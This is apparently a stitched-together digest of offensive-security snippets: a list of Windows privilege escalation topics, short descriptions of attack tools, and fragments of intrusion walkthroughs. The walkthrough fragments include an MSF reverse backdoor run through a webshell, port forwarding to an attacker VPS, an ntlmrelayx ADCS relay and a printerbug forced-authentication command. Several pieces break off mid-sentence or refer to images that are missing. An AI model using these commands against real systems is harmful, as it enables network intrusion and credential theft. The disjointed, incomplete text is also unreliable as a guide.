Windows Privilege Escalation (PEA) knowledge: permission division, basic commands, system vulnerability privilege escalation, querying patch information, database privilege escalation, UDF privilege escalation, MOF privilege escalation, boot item privilege escalation, MSF privilege escalation, kernel privilege escalation, token manipulation, and Bypass UAC.
Chinese company Socialarks leaked data from Facebook, Instagram, and LinkedIn, affecting 208 gigabytes of users and containing over 318 million records. The database contained personally identifiable information from approximately 214 million social media users worldwide. The leak was attributed to the Elasticsearch database not using strong passwords or encryption for protection.
LadonGo is an intranet penetration testing and vulnerability scanning framework that can easily detect live hosts in C, B, and A segments with a single click. It also features fingerprinting, port scanning, password brute-force, remote execution, and high-risk vulnerability detection. Version 3.2 includes 24 modules, high-risk vulnerability detection (MS17010, SmbGhost), remote execution (SshCmd, WinrmCmd), and password brute-force (SmbScan).
Fawkes is a tool that uses the Google search engine to find targets vulnerable to SQL injection attacks. It's written in Python 3 and uses 49 random user agents. An example of its usage is:
python3 fawkes.py --query 'noticias.php?id=10' --timeout 3 --verbose
Social-analyzer analyzes and finds profiles on over 300 social media websites. It includes APIs and web applications for analyzing and finding profiles on over 300 social media websites. It comprises various string analysis and detection modules. The detection modules utilize a rating mechanism based on different detection technologies to generate a ratio value from 0 to 100.
Web Fuzzing Box - A dictionary and payloads for web fuzzing, primarily including: weak password brute-force attacks, directory and file enumeration, web vulnerabilities, 401 authentication dictionaries, top ranking dictionaries, APIs, filename extensions, CTF competition dictionaries, SQL injection, URL redirection vulnerabilities, and XSS payloads dictionaries.
A batch detection tool for the Apache Flink directory traversal vulnerability CVE-2020-17519 was developed. This vulnerability allows attackers to read any file on the JobManager's local file system via the JobManager process's REST interface. The CVE-2020-17519 payload...
MyJWT is a JSON Web Token (JWT) penetration testing tool. This command-line tool is designed for penetration testers, CTF competitors, or developers. You can modify your JWT, sign it, inject it, brute-force the key, crack the JWT using regular expressions to guess the key, and use JKU Bypass and X5u Bypass.
This is a batch GetShell tool for Ruijie EG Easy Gateway devices, exploiting vulnerabilities such as Gateway GetShell. To use it, enter the remote WebShell address. This tool contains malicious code and is for authorized security testing purposes only. Run the command:
java -jar EGGatewayGetShell.jar
The experiment uses a member of the DNS Administrators group to remotely configure the DNS service and perform DLL injection into it to achieve privilege escalation.
Within a domain, the DNS server is usually the domain controller. DNS server management is RPC-based: c:\windows\system32\dns.exe exposes the RPC interface, and the \\PIPE\\DNSSERVER named pipe is used for transport.
The default ACL of the DNS service is shown in the figure below:
Upload backdoor files to gain webshell access.
In web privilege escalation, the most commonly used method is overflow vulnerability escalation, using cmd to execute files for privilege escalation. From the image below, it is clear that the permissions seen in the webshell differ from those seen on the server.
Use systeminfo for information gathering, generally focusing on the operating system version and installed patch numbers.
After obtaining the patch numbers, we need to filter patches. Two excellent projects are recommended: wesng and windowsVulnScan. Save the collected information above into 1.txt and use wesng for patch filtering.
After execution, possible vulnerabilities will be saved in vuln.csv.
Use MSF or specific EXP for privilege escalation (msf must be set up on the external network to allow the session to reverse back to the local machine; it cannot reverse in the internal network). Generate a 5577.exe backdoor, execute this backdoor via webshell, with the reverse port set to 5577.
Set the listening port to 5577.
Upload according to your system bitness:
upload xxxx.sys
Execute redirection:
PortBender redirect 445 8445
Enable port forwarding:
rportfwd 8445 vpsip 445
cs enable socks.
On the hacker machine:
Set proxy.
Enable relay:
proxychains4 ntlmrelayx.py -t http://192.168.8.144/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller';
Use socks or exe to trigger forced callback, such as printer:
python printerbug.py domain.com/user:pass@192.168.8.155 192.168.8.75
Successfully obtained certificate information:
Check the network address of the WEB server
Check the current user
Check the firewall configuration information
netsh firewall show config
Check installed antivirus software
Found no antivirus software installed.
So add your own IP to the 2001 ACL rule set. After adding the ACL rule, you can connect.
Tried to use plink to do SSH forwarding into the intranet, but the security device is different from Linux and cannot proxy.
Previously, the internal network discovery was all done using timeoutsocket, but this time, no assets were found using timeoutsocket, including some existing targets. Later, many live hosts were found using F-NAScan.
There are fewer application types on the hosts, more devices, and many weak passwords, which will not be mentioned here. The main focus is on the discovery of centralized devices.
Two centralized devices were found in the internal network. One is a terminal detection system from a certain vendor, as shown below:
Tried common passwords but couldn't get in.
The second is a terminal detection system from another vendor, accessed the backend through a weak password.